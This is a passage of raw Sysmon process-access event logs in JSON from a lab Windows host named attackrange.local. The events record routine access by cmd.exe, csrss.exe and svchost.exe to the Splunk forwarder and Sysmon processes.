AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{41C8662E-1FF4-5F25-0000-0010AA6A0500}","ParentProcessId":"2256","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2&gt;&amp;1","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3369,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F64-5F25-0000-0010B46A0100}\r\nSourceProcessId: 2256\r\nSourceThreadId: 2452\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nTargetProcessId: 2364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F64-5F25-0000-0010B46A0100}","SourceProcessId":"2256","SourceThreadId":"2452","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010596B0500}","TargetProcessId":"2364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3370,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nTargetProcessId: 2364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010596B0500}","TargetProcessId":"2364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3371,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3372,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3373,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3374,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3375,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3376,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3377,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 